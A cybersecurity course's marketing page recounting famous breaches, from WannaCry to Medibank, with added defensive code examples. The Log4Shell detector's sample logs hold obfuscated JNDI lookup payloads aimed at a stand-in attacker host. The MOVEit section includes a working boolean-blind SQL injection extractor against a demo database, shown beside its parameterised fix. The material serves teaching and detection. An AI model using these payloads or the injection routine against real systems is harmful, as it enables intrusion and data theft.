10 real breaches that changed industries, toppled companies, and proved why cybersecurity is the most in-demand skill in tech. These are not hypothetical — they happened.
A stolen NSA exploit crippled 150 countries in 72 hours — and a 22-year-old stopped it for $10.69.
On May 12, 2017, a cryptoworm called WannaCry began spreading at a speed the world had never seen. Within hours it had hit hospitals, banks, telecoms, and government agencies across 150 countries. In the UK, the NHS was brought to its knees — 80 hospital trusts locked out of patient records, surgeries cancelled, ambulances diverted.
WannaCry spread using EternalBlue, an NSA-developed exploit for a flaw in Windows SMBv1 that Microsoft had patched in March 2017 as MS17-010. When The Shadow Brokers leaked the NSA's tools in April 2017, attackers weaponised EternalBlue almost immediately. The patch had been available for two months, but millions of machines still hadn't applied it, and many still had SMBv1 enabled.
The unlikely hero was Marcus Hutchins, a 22-year-old British researcher. He noticed the malware querying a long, unregistered domain before encrypting and reasoned it was a kill-switch: if the domain resolved, the malware exited. He registered it for about $10.69 (roughly £8), and new infections stopped almost instantly.
CEH v13 covers vulnerability assessment, patch management, and network defence.
Hackers hid inside the US government for 9 months by poisoning a routine software update used by 18,000 organisations.
In December 2020, FireEye discovered that its own red team tools had been stolen. Tracing the intrusion revealed one of the most sophisticated supply-chain attacks on record: Russia's SVR had quietly inserted the SUNBURST backdoor into a signed SolarWinds Orion update, which was downloaded by up to 18,000 customers including the Pentagon, Treasury, DHS, Microsoft, and Cisco.
Attackers had first accessed SolarWinds systems in October 2019 — 14 months before discovery. They spent months inside networks reading emails, moving laterally, and exfiltrating intelligence while appearing as legitimate Orion traffic.
Learn to audit third-party software and detect lateral movement.
One leaked password, no MFA — and the US East Coast ran out of fuel.
On May 7, 2021, Colonial Pipeline shut down 5,500 miles of US fuel infrastructure after a DarkSide ransomware attack. The pipeline supplies 45% of fuel on the US East Coast. Petrol stations ran dry, prices spiked, and the federal government declared a state of emergency.
The root cause was a single legacy VPN account whose password had turned up in a dark web credential dump. No MFA. The account was no longer in active use but had never been disabled. Colonial paid $4.4M in Bitcoin; the DOJ later recovered about $2.3M by seizing the attackers' wallet.
CEH v13 Modules 2 & 5 cover OSINT, dark web monitoring and vulnerability analysis.
147 million Americans' most sensitive data stolen — because a patch sat unapplied for 78 days.
Equifax holds the financial history of nearly every American adult. In 2017, attackers later indicted as members of China's PLA exploited CVE-2017-5638, an Apache Struts flaw for which a patch had been publicly available for 78 days. They spent 76 days inside the network running roughly 9,000 database queries, stealing names, SSNs, birth dates and addresses for 147.9 million people, plus around 209,000 payment card numbers.
A congressional report called it "entirely preventable." Equifax's CISO, CIO, and CEO all resigned. The certificate on the device that inspected encrypted traffic had expired 19 months earlier, leaving security monitoring blind to the exfiltration; when it was finally renewed on July 29, 2017, analysts spotted the suspicious traffic within hours.
CEH v13 Module 5 teaches systematic CVE scanning and patch cycle management.
Disguised as ransomware, it was a weapon designed to destroy. $10B in damage. No decryption key existed.
NotPetya began in Ukraine on June 27, 2017, spreading globally via a poisoned update to the Ukrainian accounting package M.E.Doc, then moving laterally with EternalBlue and stolen Windows credentials. It looked like ransomware, but researchers quickly confirmed there was no working decryption mechanism: NotPetya was a wiper designed purely to destroy, and the US, UK and allies attributed it to Russia's GRU.
Shipping giant Maersk had 45,000 PCs, 4,000 servers and its entire application estate wiped; the malware crossed its global network in about seven minutes. They rebuilt everything from scratch in ten days, helped by a single domain controller in Ghana that survived only because a power outage had left it offline. Merck lost $870M. FedEx subsidiary TNT lost $400M and never fully recovered.
CEH v13 covers malware threats and the incident response procedures that determine who survives.
40 million credit cards stolen over Christmas. The entry point? A heating and air conditioning contractor.
In November 2013, attackers compromised Fazio Mechanical Services, a small HVAC contractor with remote access to Target's systems for billing. Using phished Fazio credentials, they installed POS malware on Target's checkout terminals across 1,800+ stores during the busiest retail week of the year.
Between November 27 and December 15, the malware silently collected 40 million payment cards (and a further 70 million customer records). Target's $1.6M FireEye system detected the intrusion and raised alerts, but the security team reviewed and dismissed them, and the tool's automatic malware-removal feature had been switched off. The breach was ultimately discovered by the US DOJ, which notified Target, not by Target itself.
CEH v13 covers vendor risk management, network access controls, and SOC alert procedures.
No malware. No exploit. A phone call, a LinkedIn profile, and 10 minutes to shut down a $14B casino empire.
In September 2023, Scattered Spider, a loose group of mostly English-speaking teenagers and young adults, took down MGM Resorts' operations. Slot machines went dark, hotel key cards stopped working, the website went offline, and casino floors ran manually for 10+ days. Initial access relied purely on human psychology.
The attackers found an MGM IT employee on LinkedIn in approximately 10 minutes, called the IT helpdesk impersonating that employee, and used social engineering to get credentials reset. With Okta superadmin access, they deployed BlackCat/ALPHV ransomware across MGM's infrastructure.
Learn how attackers exploit human psychology and how to design systems that resist it.
One line of text. 3 billion devices. Apple, Amazon, Tesla, and the US government all scrambling at once.
On December 9, 2021, a working exploit for CVE-2021-44228 in Apache Log4j (Log4Shell) went public; it was scored CVSS 10.0, the maximum possible. Log4j was embedded in a huge share of enterprise Java software, including systems at Apple iCloud, Amazon AWS, Tesla, Twitter, Steam, VMware, Cisco, IBM, and US government agencies. Any attacker-controlled string that reached a log statement (a User-Agent header, a username, a chat message) could carry a JNDI lookup expression that the vulnerable library resolved by fetching and executing code from an attacker's server. Full remote code execution, no authentication required.
Within hours of public disclosure, mass exploitation had begun. CISA added the CVE to its Known Exploited Vulnerabilities catalogue the next day and on December 17 issued Emergency Directive 22-02 ordering all federal agencies to patch or mitigate. At peak, researchers observed over 100 exploitation attempts per minute. The vulnerable JNDI lookup feature had been in Log4j 2 since 2013, more than eight years.
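Added example (not from the original article, and not the Log4j project's code): a small detector that hunts for Log4Shell lookup strings in web access logs. The log lines are constructed for the demo and 203.0.113.7 is a documentation address standing in for an attacker host. The point it makes is that attackers rarely send the plain `${jndi:ldap://...}` string; they URL-encode it or hide it behind Log4j's own nested lookups such as `${lower:j}` and `${::-j}`, so a detector has to normalise before matching.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not real traffic). Lines 1-4 (zero-based) carry a
# JNDI lookup: plain, nested ${lower:} obfuscation, URL-encoded, and ${::-x} default-value
# obfuscation. 203.0.113.7 is a documentation address standing in for an attacker host.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:03:12:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:12:07 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:13:02 +0000] "GET /search?q=${${lower:j}ndi:rmi://203.0.113.7/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:03:13:30 +0000] "GET /?x=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.7%2Fleak%7D HTTP/1.1" 200 12 "-" "-"',
    '10.0.0.9 - - [10/Dec/2021:03:14:00 +0000] "GET /a HTTP/1.1" 200 1 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.7/b}"',
]

# ${lower:X} / ${upper:X} case lookups, ${name:-default} default values (including ${::-x}),
# and the lookup we are actually hunting for.
_CASE_LOOKUP = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^{}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def normalise(text: str, max_rounds: int = 5) -> str:
    """Undo the layers attackers use to hide a lookup from naive string matching."""
    for _ in range(max_rounds):            # repeated URL-decoding (double-encoding is common)
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    previous = None
    while previous != text:                # resolve innermost lookups until nothing changes
        previous = text
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
    return text


def find_log4shell_attempts(lines):
    """Return (line_index, jndi_scheme, normalised_line) for each line carrying a JNDI lookup."""
    hits = []
    for idx, line in enumerate(lines):
        normalised = normalise(line)
        match = _JNDI.search(normalised)
        if match:
            hits.append((idx, match.group(1).lower(), normalised))
    return hits


if __name__ == "__main__":
    for idx, scheme, line in find_log4shell_attempts(SAMPLE_LOG_LINES):
        print(f"line {idx}: jndi scheme={scheme}\n    {line}")
```

Run it over real access, proxy or WAF logs from the disclosure window and treat every hit as a triage lead, not proof of compromise: the string only does damage if it reached a vulnerable Log4j instance, so pair the log search with an inventory of Log4j versions. A hit with an `ldap` or `rmi` scheme pointing at an external host is the one to chase first.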
CEH v13 Module 5 teaches vulnerability scanning and rapid emergency patching response.
The largest data breach in history. Yahoo hid it for two years. Then hid a second breach. Then a third.
In August 2013, attackers compromised every Yahoo account then in existence, about 3 billion in total. Passwords were hashed with MD5, a fast general-purpose hash that has been considered cryptographically weak since the mid-1990s and offers almost no resistance to offline cracking. Security questions and answers were stored in plain text for many accounts. A separate 2014 intrusion, later attributed by the US DOJ to officers of Russia's FSB, hit 500 million accounts; Yahoo knew of it in 2014 but did not disclose it until September 2016.
The disclosures came in stages. In September 2016 Yahoo announced the 2014 breach as affecting "only" 500 million accounts. In December 2016 it disclosed the 2013 breach as affecting 1 billion. In October 2017, after Verizon had completed its acquisition, the figure was revised to all 3 billion accounts ever created. Every Yahoo account had been compromised for years without users knowing, and Verizon had already cut its purchase price by $350M when the breaches came to light.
Learn modern password hashing, encryption standards, and why outdated crypto creates catastrophic vulnerabilities.
An 18-year-old spammed push notifications until an employee gave up — then announced it on Uber's own Slack.
In September 2022, an 18-year-old hacker compromised Uber's internal network using a purchased credential and relentless social engineering. The attacker repeatedly triggered MFA push notifications to a contractor's phone, a technique called MFA fatigue or push bombing, and reportedly messaged the contractor on WhatsApp posing as Uber IT. After dozens of notifications over about an hour, the contractor accepted one.
Inside, the attacker found PowerShell scripts on a network share with hardcoded admin credentials for Uber's privileged access management system. Within an hour they had access to AWS, GCP, VMware vSphere, Slack, and HackerOne, including confidential vulnerability reports. They announced the breach directly in Uber's company Slack. Employees thought it was a joke.
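Added example (not from the original article, and not Uber's or any MFA vendor's code): detection logic for push bombing, run over a constructed sample of MFA events in a hypothetical JSON log format. The rule is simple and effective: alert when a user approves a push after a burst of denials or timeouts inside a short window. The user names, timestamps and IPs are all made up for the demo.

```python
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Constructed sample events in a hypothetical MFA-provider log format (not a real vendor schema).
# "contractor1" is pushed nine times in seven minutes and finally approves; "alice" mis-taps once.
SAMPLE_EVENTS = [
    '{"ts": "2022-09-15T01:02:10Z", "user": "contractor1", "result": "denied",   "ip": "198.51.100.23"}',
    '{"ts": "2022-09-15T01:02:40Z", "user": "contractor1", "result": "denied",   "ip": "198.51.100.23"}',
    '{"ts": "2022-09-15T01:03:15Z", "user": "contractor1", "result": "timeout",  "ip": "198.51.100.23"}',
    '{"ts": "2022-09-15T01:04:05Z", "user": "alice",       "result": "timeout",  "ip": "10.20.0.8"}',
    '{"ts": "2022-09-15T01:04:30Z", "user": "contractor1", "result": "denied",   "ip": "198.51.100.23"}',
    '{"ts": "2022-09-15T01:05:00Z", "user": "alice",       "result": "approved", "ip": "10.20.0.8"}',
    '{"ts": "2022-09-15T01:05:20Z", "user": "contractor1", "result": "denied",   "ip": "198.51.100.23"}',
    '{"ts": "2022-09-15T01:06:10Z", "user": "contractor1", "result": "timeout",  "ip": "198.51.100.23"}',
    '{"ts": "2022-09-15T01:07:00Z", "user": "contractor1", "result": "denied",   "ip": "198.51.100.23"}',
    '{"ts": "2022-09-15T01:08:30Z", "user": "contractor1", "result": "denied",   "ip": "198.51.100.23"}',
    '{"ts": "2022-09-15T01:09:12Z", "user": "contractor1", "result": "approved", "ip": "198.51.100.23"}',
]


def parse_event(line: str) -> dict:
    ev = json.loads(line)
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ev


def detect_push_bombing(lines, window=timedelta(minutes=10), threshold=5):
    """Alert when a user approves a push after >= `threshold` denials/timeouts within `window`.

    Returns a list of dicts with user, approved_at, prior_rejections and source_ips.
    """
    events = sorted((parse_event(line) for line in lines), key=lambda e: e["ts"])
    pending = defaultdict(deque)          # user -> deque of (ts, ip) for non-approved prompts
    alerts = []
    for ev in events:
        q = pending[ev["user"]]
        while q and ev["ts"] - q[0][0] > window:   # forget prompts older than the window
            q.popleft()
        if ev["result"] == "approved":
            if len(q) >= threshold:
                alerts.append({
                    "user": ev["user"],
                    "approved_at": ev["ts"].isoformat(),
                    "prior_rejections": len(q),
                    "source_ips": sorted({ip for _, ip in q} | {ev["ip"]}),
                })
            q.clear()                                 # a fresh login starts a fresh count
        else:
            q.append((ev["ts"], ev["ip"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_push_bombing(SAMPLE_EVENTS):
        print("PUSH BOMBING:", alert)
```

In a SIEM the same rule becomes a count of non-approved push results per user over a sliding window, joined to the next approval. The control that removes the attack class altogether is number matching or phishing-resistant MFA, since a user cannot "accept by accident" when the prompt demands a code shown only on the real login screen.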
CEH v13 covers modern auth attacks, social engineering countermeasures and secrets auditing.
One SQL injection zero-day in file transfer software gave Cl0p access to data from roughly 2,620 organisations — without encrypting a single file.
On the Friday before US Memorial Day 2023, when IT teams were heading into a long weekend, the Cl0p extortion group began mass-exploiting a zero-day SQL injection vulnerability in MOVEit Transfer that they had reportedly been testing since 2021. CVE-2023-34362 affected managed file transfer software used by thousands of enterprises, governments, and healthcare providers to move sensitive data. The injection gave unauthenticated attackers access to the MOVEit database and let them plant a web shell (named LEMURLOOT by Mandiant) to pull files out.
Unlike traditional ransomware, Cl0p didn't encrypt anything. They went straight for the data, exfiltrating from exposed MOVEit servers over a few days and then sending extortion letters. The victim count eventually reached roughly 2,620 organisations, many of them hit indirectly through payroll or service providers that ran MOVEit. Victims included the BBC, British Airways, Shell, the US Department of Energy, and Maximus, which exposed records of up to 11 million US Medicare and Medicaid beneficiaries.
SQL injection is hands-on in DVWA (Damn Vulnerable Web App) and OWASP Juice Shop on our lab environment. Try both manual exploitation (union-based, boolean-blind) and automated enumeration. CEH v13 Module 14 covers web application hacking, including SQL injection attack chains exactly like this one.
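Added example (not from the original article, and not the MOVEit vulnerability itself): a self-contained boolean-blind SQL injection against a deliberately vulnerable SQLite lookup, alongside the parameterised version that defeats it. The database, table, usernames and api_key values are constructed for the demo. It shows the mechanism the MOVEit attack relied on: a query built from untrusted input lets an attacker ask the database yes/no questions until a secret is recovered, without ever seeing query output.

```python
import sqlite3
import string

CHARSET = string.ascii_lowercase + string.digits + "-"   # alphabet of the secret being recovered


def build_db() -> sqlite3.Connection:
    """Constructed demo database; the api_key values are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, api_key TEXT)")
    conn.executemany("INSERT INTO users (username, api_key) VALUES (?, ?)",
                     [("admin", "k3y-9f2a"), ("bob", "k3y-1111")])
    conn.commit()
    return conn


def user_exists_vulnerable(conn, username: str) -> bool:
    """Query built by string formatting, so the input becomes part of the SQL."""
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchone() is not None


def user_exists_safe(conn, username: str) -> bool:
    """Parameterised: the value travels separately from the query text and is never parsed as SQL."""
    return conn.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone() is not None


def blind_extract(oracle, subquery: str, max_len: int = 32):
    """Boolean-blind extraction. `oracle(username)` returns True/False and leaks nothing else.

    Each request asks "is character N of the secret equal to X?". Returns (value, request_count).
    """
    recovered, requests = "", 0
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            requests += 1
            payload = f"admin' AND substr(({subquery}),{pos},1)='{ch}' -- "
            if oracle(payload):
                recovered += ch
                break
        else:
            break            # no character matched: end of the secret (or the target is not injectable)
    return recovered, requests


ADMIN_KEY_SUBQUERY = "SELECT api_key FROM users WHERE username='admin'"

if __name__ == "__main__":
    conn = build_db()
    leaked, n = blind_extract(lambda u: user_exists_vulnerable(conn, u), ADMIN_KEY_SUBQUERY)
    print(f"vulnerable endpoint: recovered {leaked!r} in {n} requests")
    leaked, n = blind_extract(lambda u: user_exists_safe(conn, u), ADMIN_KEY_SUBQUERY)
    print(f"parameterised endpoint: recovered {leaked!r} in {n} requests")
```

Against the vulnerable function the attacker recovers the admin key one character per positive answer; against the parameterised one every payload is just a username that doesn't exist, so the loop stops at the first position with nothing recovered. Real tooling speeds this up with binary search over character codes, and a union-based variant would pull the whole column in one request wherever output is reflected, but the defence is identical: parameterise every query and never build SQL from request data.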
Learn to find, exploit, and defend against injection attacks in our DVWA and Juice Shop labs.
China's HAFNIUM chained 4 zero-days to bypass authentication and own 250,000 email servers worldwide — then the patch release triggered a global exploitation free-for-all.
In early 2021, China's HAFNIUM APT group quietly exploited four chained vulnerabilities in Microsoft Exchange Server, the email platform used by hundreds of thousands of organisations worldwide. The first, CVE-2021-26855 (ProxyLogon), was a server-side request forgery (SSRF) flaw that let an unauthenticated attacker on the internet send requests that the server treated as its own, bypassing authentication entirely. Chained with the remaining bugs, it gave attackers the ability to write files to the server and drop web shells.
Microsoft released patches on March 2, 2021. But here's what made it catastrophic: other nation-state actors reverse-engineered the patch to understand the vulnerability. Within 24 hours of the patch release, at least 10 different APT groups had joined HAFNIUM in mass exploitation. Organisations that hadn't patched overnight found web shells already deployed when they arrived at work the next morning.
SSRF and HTTP header manipulation are covered in CEH v13 Module 14 (Hacking Web Applications). Practise authentication bypass techniques on DVWA and explore web shell deployment on Metasploitable 2 in our lab. Understanding how chained vulnerabilities multiply attack impact is a core CEH exam objective.
Modules 5 and 14 cover vulnerability chaining, SSRF, and web server exploitation techniques.
Attackers targeted one engineer's home PC, stole cloud credentials, pulled 33 million encrypted vaults — then drained $35M from users' crypto wallets using TOTP seeds that LastPass stored unencrypted.
LastPass, trusted by 33 million users to store every password they own, suffered two linked breaches in 2022. In August 2022, an attacker stole source code and customer data using compromised developer credentials. Four months later, they used data from Breach 1 to identify a specific DevOps engineer — then compromised that engineer's home personal computer using an unpatched Plex Media Server vulnerability (CVE-2020-5741).
A keylogger on that home PC captured the engineer's master password for a corporate vault holding the AWS access keys and decryption keys for LastPass's cloud backup storage. With those, the attacker exfiltrated encrypted password vaults for all 33 million users. But the real weapon was what sat unencrypted alongside them: website URLs, usernames, email addresses, and critically, TOTP authenticator seeds. A TOTP seed is the whole secret: anyone holding it generates exactly the same six-digit codes as the user's phone, so attackers could produce valid MFA codes for any site where users had stored their 2FA in LastPass, including crypto exchanges.
Cloud security and secrets management are covered in CEH v13 Module 19 (Cloud Computing) and Security+ Domain 3 (Implementation). Practise identifying misconfigured cloud storage access controls. Understand why endpoint security must extend to personal devices — any home machine with corporate credentials is a potential entry point.
CEH v13 Module 19 and Security+ cover cloud access controls, secrets vaults, and privileged endpoint security.
A 17-year-old used LinkedIn recon, phone vishing, and a real-time AiTM phishing portal to hijack Obama, Biden, Musk, Gates, and Apple — then ran a Bitcoin scam from the world's most trusted accounts.
On July 15, 2020, the world watched in real time as verified accounts for Barack Obama, Joe Biden, Bill Gates, Elon Musk, Apple, Uber, and 124 others posted the same message: "I'm giving back to the community due to COVID-19. Send $1,000, I'll send $2,000 back." Every post was a scam. Every account had been taken over by a 17-year-old in Tampa, Florida, using a phone call and a fake login page.
Graham Ivan Clark and his accomplices used LinkedIn to identify Twitter employees with access to internal tools, then called them posing as Twitter IT department staff. They directed employees to a fake internal VPN portal that harvested credentials and MFA tokens in real time — a classic adversary-in-the-middle (AiTM) attack. With those credentials, they accessed Twitter's internal "agent tool" — a customer support platform that could change email addresses, disable 2FA, and generate login sessions for any account on Twitter.
Social engineering, vishing, and phishing defence are covered in CEH v13 Module 9 (Social Engineering). Learn to recognise and defeat adversary-in-the-middle (AiTM) phishing attacks, including how attackers relay live MFA codes through a proxy. Understand why origin-bound authenticators (FIDO2/WebAuthn security keys and passkeys, or PIV smart cards) resist AiTM phishing, since the credential is tied to the genuine site's origin and cannot be replayed from a proxy, and why privileged tool access must be logged, rate-limited, and restricted to a small set of staff.
CEH v13 Module 9 covers vishing, spear phishing, AiTM attacks, and social engineering countermeasures.
When Australia's largest health insurer refused to pay a $9.7M ransom, a Russian hacker published cancer diagnoses, HIV status, and mental health records for 9.7 million Australians — targeting the most vulnerable patients first.
In October 2022, Australia's largest private health insurer discovered a hacker had been inside their systems for weeks. Aleksandr Ermakov, a Russian national linked to the REvil ransomware group, had obtained the credentials of a Medibank contractor — credentials that gave direct VPN access to Medibank's internal network. There was no MFA on the VPN connection. A single username and password was all that stood between the attacker and 9.7 million medical records.
Ermakov spent weeks inside the network performing reconnaissance before exfiltrating customer records, including the most sensitive category of personal data imaginable: medical diagnoses, treatment procedures, mental health records, HIV status, substance abuse history, and reproductive health data. When Medibank refused to pay the $9.7M ransom, he deliberately published a "naughty list", the names and conditions of patients with drug habits, mental health conditions, and HIV, to maximise public pressure and human suffering.
Third-party access risk and network reconnaissance are covered in CEH v13 Modules 2–5 (Footprinting, Network Scanning, Enumeration, Vulnerability Analysis). Learn to detect lateral movement with SIEM tools and understand network segmentation to contain breaches. MFA implementation and third-party access controls are core objectives of Security+ Domain 3.
CEH v13 and Security+ cover VPN hardening, third-party access control, dark web monitoring, and incident response.
WannaCry. SolarWinds. Colonial Pipeline. MOVEit. LastPass. Medibank. Every single breach on this page was preventable with the right skills — patch management, MFA, SQL injection defence, social engineering awareness. CEH v13 and Security+ teach you exactly what was missing in every case.